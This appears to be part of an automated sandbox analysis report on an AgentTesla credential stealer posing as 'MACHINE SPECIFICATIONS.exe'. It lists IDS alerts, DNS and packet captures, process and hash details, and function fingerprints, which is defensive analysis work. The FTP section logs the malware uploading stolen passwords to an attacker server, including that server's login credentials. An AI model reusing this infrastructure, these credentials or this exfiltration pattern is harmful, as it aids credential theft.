RT_ICON	0x7f6a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_GROUP_ICON	0x81c48	0x30	data
RT_VERSION	0x81c78	0x23c	data
RT_MANIFEST	0x81eb4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759	TCP	2029927	ET TROJAN AgentTesla Exfil via FTP	49702	21	192.168.2.3	51.195.62.160
192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49703	52259	192.168.2.3	51.195.62.160

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 11:19:53.759691000 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:53.759767056 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:53.759933949 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:53.807363987 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:53.807424068 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.121747017 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.122018099 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:54.132211924 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:54.132246971 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.132662058 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.338932991 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.339055061 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:54.616307974 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:54.616383076 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.763174057 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.763329983 CET	443	49701	3.220.57.224	192.168.2.3
Nov 29, 2022 11:19:54.763463974 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:19:54.767330885 CET	49701	443	192.168.2.3	3.220.57.224
Nov 29, 2022 11:20:12.212491989 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.231043100 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.231232882 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.250191927 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.250646114 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.269145012 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.269206047 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.269444942 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.296277046 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.296541929 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.314970016 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.315330029 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.333745003 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.334007978 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.352402925 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.354644060 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.373279095 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.378772974 CET	49703	52259	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.397347927 CET	52259	49703	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.397562027 CET	49703	52259	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.397758961 CET	49702	21	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.416052103 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.420526028 CET	49703	52259	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.420638084 CET	49703	52259	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.438709974 CET	52259	49703	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.438776970 CET	52259	49703	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.438832998 CET	21	49702	51.195.62.160	192.168.2.3
Nov 29, 2022 11:20:12.438872099 CET	49703	52259	192.168.2.3	51.195.62.160
Nov 29, 2022 11:20:12.438963890 CET	49702	21	192.168.2.3	51.195.62.160

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 11:19:53.677805901 CET	57990	53	192.168.2.3	8.8.8.8
Nov 29, 2022 11:19:53.695560932 CET	53	57990	8.8.8.8	192.168.2.3
Nov 29, 2022 11:19:53.711530924 CET	52387	53	192.168.2.3	8.8.8.8
Nov 29, 2022 11:19:53.730598927 CET	53	52387	8.8.8.8	192.168.2.3
Nov 29, 2022 11:20:12.084580898 CET	56924	53	192.168.2.3	8.8.8.8
Nov 29, 2022 11:20:12.209414005 CET	53	56924	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 11:19:53.677805901 CET	192.168.2.3	8.8.8.8	0xfd66	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.711530924 CET	192.168.2.3	8.8.8.8	0x6f4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:20:12.084580898 CET	192.168.2.3	8.8.8.8	0xa066	Standard query (0)	ftp.electrobist.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 11:18:50.334419966 CET	8.8.8.8	192.168.2.3	0xd9b5	No error (0)	au.c-0001.c-msedge.net	c-0001.c-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 11:18:50.334419966 CET	8.8.8.8	192.168.2.3	0xd9b5	No error (0)	c-0001.c-msedge.net		13.107.4.50	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.695560932 CET	8.8.8.8	192.168.2.3	0xfd66	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 11:19:53.695560932 CET	8.8.8.8	192.168.2.3	0xfd66	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.695560932 CET	8.8.8.8	192.168.2.3	0xfd66	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.695560932 CET	8.8.8.8	192.168.2.3	0xfd66	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.695560932 CET	8.8.8.8	192.168.2.3	0xfd66	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.730598927 CET	8.8.8.8	192.168.2.3	0x6f4	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 11:19:53.730598927 CET	8.8.8.8	192.168.2.3	0x6f4	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.730598927 CET	8.8.8.8	192.168.2.3	0x6f4	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.730598927 CET	8.8.8.8	192.168.2.3	0x6f4	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:19:53.730598927 CET	8.8.8.8	192.168.2.3	0x6f4	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 29, 2022 11:20:12.209414005 CET	8.8.8.8	192.168.2.3	0xa066	No error (0)	ftp.electrobist.com		51.195.62.160	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49701	3.220.57.224	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Direction	Data
2022-11-29 10:19:54 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
2022-11-29 10:19:54 UTC	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Tue, 29 Nov 2022 10:19:54 GMT Content-Length: 14 Via: 1.1 vegur
2022-11-29 10:19:54 UTC	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 Data Ascii: 102.129.143.49

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 29, 2022 11:20:12.250191927 CET	21	49702	51.195.62.160	192.168.2.3	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Nov 29, 2022 11:20:12.250646114 CET	49702	21	192.168.2.3	51.195.62.160	USER user1@electrobist.com
Nov 29, 2022 11:20:12.269206047 CET	21	49702	51.195.62.160	192.168.2.3	331 User user1@electrobist.com OK. Password required
Nov 29, 2022 11:20:12.269444942 CET	49702	21	192.168.2.3	51.195.62.160	PASS w&oNc9e]pf~4
Nov 29, 2022 11:20:12.296277046 CET	21	49702	51.195.62.160	192.168.2.3	230 OK. Current restricted directory is /
Nov 29, 2022 11:20:12.314970016 CET	21	49702	51.195.62.160	192.168.2.3	504 Unknown command
Nov 29, 2022 11:20:12.315330029 CET	49702	21	192.168.2.3	51.195.62.160	PWD
Nov 29, 2022 11:20:12.333745003 CET	21	49702	51.195.62.160	192.168.2.3	257 "/" is your current location
Nov 29, 2022 11:20:12.334007978 CET	49702	21	192.168.2.3	51.195.62.160	TYPE I
Nov 29, 2022 11:20:12.352402925 CET	21	49702	51.195.62.160	192.168.2.3	200 TYPE is now 8-bit binary
Nov 29, 2022 11:20:12.354644060 CET	49702	21	192.168.2.3	51.195.62.160	PASV
Nov 29, 2022 11:20:12.373279095 CET	21	49702	51.195.62.160	192.168.2.3	227 Entering Passive Mode (51,195,62,160,204,35)
Nov 29, 2022 11:20:12.397758961 CET	49702	21	192.168.2.3	51.195.62.160	STOR PW_user-965543_2022_11_29_11_20_10.html
Nov 29, 2022 11:20:12.416052103 CET	21	49702	51.195.62.160	192.168.2.3	150 Accepted data connection
Nov 29, 2022 11:20:12.438832998 CET	21	49702	51.195.62.160	192.168.2.3	226-File successfully transferred 226-File successfully transferred226 0.023 seconds (measured here), 19.62 Kbytes per second

Target ID:	0
Start time:	11:18:56
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Imagebase:	0x19218000000
File size:	523776 bytes
MD5 hash:	92945D0A2731EF771EA9D10C792E03E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Target ID:	10
Start time:	11:19:46
Start date:	29/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Imagebase:	0x10000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Target ID:	11
Start time:	11:20:05
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x800000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Target ID:	12
Start time:	11:20:05
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	11:20:13
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x490000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Target ID:	14
Start time:	11:20:14
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	16%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.2%
Total number of Nodes:	407
Total number of Limit Nodes:	50

Executed Functions

Function 05EE8B28 Relevance: 5.4, Strings: 4, Instructions: 385
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 05EE8BA1
\, xrefs: 05EE8C71
\, xrefs: 05EE8D66
\, xrefs: 05EE8D2B

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID: \$\$\$\
API String ID: 0-3238275731
Opcode ID: ea4eaf8d5eaa67f51ec56164808f4716f853bc71942a2ff6f764e4f5d8f76b08
Instruction ID: 46b3e83b5f4d0803d9b9db1084fedc9fb6e2b329e15297bc83c78cee3145b05e
Opcode Fuzzy Hash: ea4eaf8d5eaa67f51ec56164808f4716f853bc71942a2ff6f764e4f5d8f76b08
Instruction Fuzzy Hash: 2ED10471B142148BDB18EBB898507BE77E3AFC8318F149929D50AEB384EF74DC468791

Uniqueness

Uniqueness Score: -1.00%

Function 05EE3D4C Relevance: 3.2, Strings: 2, Instructions: 749COMMON

Download Yara Rule

Strings

\$l, xrefs: 05EE3875
D0)l, xrefs: 05EE4512

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID: D0)l$\$l
API String ID: 0-464691938
Opcode ID: 0e3e14981b5db4cf75b363029d557b5b8ec633ca82e9a794ae406dcdb94a481d
Instruction ID: 103b871e9a673d460ad5761cbf1362b1e914d52774282492a6b6c70662a0de40
Opcode Fuzzy Hash: 0e3e14981b5db4cf75b363029d557b5b8ec633ca82e9a794ae406dcdb94a481d
Instruction Fuzzy Hash: BC421730F101149FEB28DB68C855BBEB6E3AF89314F158869E54AEF3C1DA74EC418791

Uniqueness

Uniqueness Score: -1.00%

Function 05E95F40 Relevance: 2.8, Instructions: 2761COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd4d0311f9b4946f8144a7821a502daf8294e1f01ce8b4a3339cca31352415f
Instruction ID: a365ba0c20bef516d886d452a3d13dc92af95261842715b53aa95ac703bac15a
Opcode Fuzzy Hash: 6bd4d0311f9b4946f8144a7821a502daf8294e1f01ce8b4a3339cca31352415f
Instruction Fuzzy Hash: 10530D70D14B598EDB15EF68C844AE9F7B1FF9A304F51D69AE04867221EB30AAC4CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05EE0040 Relevance: 2.4, Strings: 1, Instructions: 1177COMMON

Download Yara Rule

Strings

8^)l, xrefs: 05EE0427

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID: 8^)l
API String ID: 0-1924906608
Opcode ID: a0396a7a2b46bce1918de26b0859d9838fba92c2da332614e902c49cbab5c1f7
Instruction ID: 5a02eed19ba0b06a0dd01b463abcf49db2a216cfaf25b032758859ea9dd86af1
Opcode Fuzzy Hash: a0396a7a2b46bce1918de26b0859d9838fba92c2da332614e902c49cbab5c1f7
Instruction Fuzzy Hash: 5192A430B142188FEB24DB68C498BADB7A2FF85318F14916AD446EF391DBB4DD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05EE33E4 Relevance: 1.9, Strings: 1, Instructions: 648COMMON

Download Yara Rule

Strings

\$l, xrefs: 05EE3875

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID: \$l
API String ID: 0-1567737467
Opcode ID: 2512f852c615a736224ba9890573e5f1bc7a50c063d3b8de389763619cbba2da
Instruction ID: 524438a82815119fcf0a9ac366450810bcf5787ec6bc784f12e2da71d16b5c06
Opcode Fuzzy Hash: 2512f852c615a736224ba9890573e5f1bc7a50c063d3b8de389763619cbba2da
Instruction Fuzzy Hash: 1832A270B142089FEB24DB68C884BAEB7F3EF89314F158969E185DB391DB34EC458B51

Uniqueness

Uniqueness Score: -1.00%

Function 05EE372C Relevance: 1.7, Strings: 1, Instructions: 402COMMON

Download Yara Rule

Strings

\$l, xrefs: 05EE3875

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID: \$l
API String ID: 0-1567737467
Opcode ID: bb9d50e806c640671bf76b545ff7d3a2510c595f889b2f7fa1335e9640059759
Instruction ID: ed5d832dc281fb739116437d7bda5a93e1b5b3c5366719dd102984a016f69b12
Opcode Fuzzy Hash: bb9d50e806c640671bf76b545ff7d3a2510c595f889b2f7fa1335e9640059759
Instruction Fuzzy Hash: EFE19070F101089FEB14DB68C454BAEB7F3AB89318F158869E549EF391CB75EC818B51

Uniqueness

Uniqueness Score: -1.00%

Function 05DF7BF0 Relevance: 1.6, APIs: 1, Instructions: 148
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05DF7C51

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 442e7ee3a37fe040f4296ab533129d2706d8cb8a077733d5915b91fbfa35fc22
Instruction ID: a30964706968541f1b804d9b5e23c06b6684065bb345279fa00617471dd08e1c
Opcode Fuzzy Hash: 442e7ee3a37fe040f4296ab533129d2706d8cb8a077733d5915b91fbfa35fc22
Instruction Fuzzy Hash: AA519670A00209DBDB04EFB4D848AEEB7A6FF88304F15896AD516DB391EF34E9058B50

Uniqueness

Uniqueness Score: -1.00%

Function 05EE3730 Relevance: 1.6, Strings: 1, Instructions: 371COMMON

Download Yara Rule

Strings

\$l, xrefs: 05EE3875

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID: \$l
API String ID: 0-1567737467
Opcode ID: 2f36e67ebcb8bd136c58885e493bc362ce16f2aca7f8d55d35d577f3f9f8285d
Instruction ID: e1ab7b99571c849c67feb5b219771cf5484f7f38f01fc7abed23e772b46cfea3
Opcode Fuzzy Hash: 2f36e67ebcb8bd136c58885e493bc362ce16f2aca7f8d55d35d577f3f9f8285d
Instruction Fuzzy Hash: E2D17F70F101089FEB14DB68C458BAEB6F3AB89314F15C869E449EF391CB75ED818B51

Uniqueness

Uniqueness Score: -1.00%

Function 05EEC1E0 Relevance: 1.6, Strings: 1, Instructions: 340COMMON

Download Yara Rule

Strings

$%%l, xrefs: 05EEC2A8

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID: $%%l
API String ID: 4139908857-2623905514
Opcode ID: e4a4c4e5e941254a51d66c4fa0eadcc8386d3a94bdac40511ae7cbf8147c4a9b
Instruction ID: 63c8bc28fd44d28bd4d8871865b5e423179b1f61180e665a0b9777bf9a482496
Opcode Fuzzy Hash: e4a4c4e5e941254a51d66c4fa0eadcc8386d3a94bdac40511ae7cbf8147c4a9b
Instruction Fuzzy Hash: E7D14B74A002198FCB05EFA4E454AEEBBB2FF89304F118569D506AB394DB389D46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05E929C8 Relevance: 1.0, Instructions: 1001COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64874ee037323a2215186d47ae3bfcbd963e1eb5793165fb620b98268755e7ed
Instruction ID: 53d603e2d76190eea97e88971f3f373627bd2d1b1e2f33a69b4d6b67ecc53c4b
Opcode Fuzzy Hash: 64874ee037323a2215186d47ae3bfcbd963e1eb5793165fb620b98268755e7ed
Instruction Fuzzy Hash: B8829D34A002089FEF28DBA8C4447AEB7B2FF89308F218969D545DB395DB35DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 05EE5668 Relevance: .8, Instructions: 769COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37bcf029a7e1bdd5a261128851783f79df8338032dd53b0173f8ee4af53c8cee
Instruction ID: 9457d35ea83e2d3abca018d7d12ef06b1b58a59b7009f2e7a90a4c9e80b851a2
Opcode Fuzzy Hash: 37bcf029a7e1bdd5a261128851783f79df8338032dd53b0173f8ee4af53c8cee
Instruction Fuzzy Hash: FD42F330F142148FDB14EBB8D894AAEBBB2EF85318F14816AD54AEB391DB34DC45C791

Uniqueness

Uniqueness Score: -1.00%

Function 05DFBE50 Relevance: .8, Instructions: 760COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0746158d23a145afa24640652cd835b3e4e77251ea62102ccca65b28372bd8
Instruction ID: f0c758f657d6de6ca1fe1680134e7d449262f881cd625798f5f4554653142a43
Opcode Fuzzy Hash: cc0746158d23a145afa24640652cd835b3e4e77251ea62102ccca65b28372bd8
Instruction Fuzzy Hash: 8A620831E046188FCB24EF78C85469EB7F2AF89304F1185AAD54AAB750EF309E95CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05E9BC40 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64451b1923a6d77ac445ae1045f30dc541315e3caa33132c868d65fd4ef2162d
Instruction ID: dfb3af8f17f9774b61057b9913fde3dd3a3cc6d27389af5a966227a0635c899b
Opcode Fuzzy Hash: 64451b1923a6d77ac445ae1045f30dc541315e3caa33132c868d65fd4ef2162d
Instruction Fuzzy Hash: 44F18170B002189FDB18DFA8C894BAEB7F7AF89314F158469E545EB391DB34EC418B91

Uniqueness

Uniqueness Score: -1.00%

Function 05E92020 Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e82e082cd47a74c3432e39967f21ed44e90a9ce5cf2aa07ab010e10b23c7543
Instruction ID: 3cf0d4e2b3a8b960be3c500a4475750c8c6481d3de2dcef34d77c04cd892a7d8
Opcode Fuzzy Hash: 4e82e082cd47a74c3432e39967f21ed44e90a9ce5cf2aa07ab010e10b23c7543
Instruction Fuzzy Hash: B4F1C634B042186FEF28DBA8C854BBE77A7FB89308F155476E645DB382DB24DC418752

Uniqueness

Uniqueness Score: -1.00%

Function 05DFF2A0 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a3b37f0c7d14eec6ee31746c38024d1d8b1b0181b91ccc3d0c9e21189b3841
Instruction ID: 1be3435b86f7419c9d54c3b5b8da77c5c83ed1dc50240b53c30fb96c879824f0
Opcode Fuzzy Hash: a4a3b37f0c7d14eec6ee31746c38024d1d8b1b0181b91ccc3d0c9e21189b3841
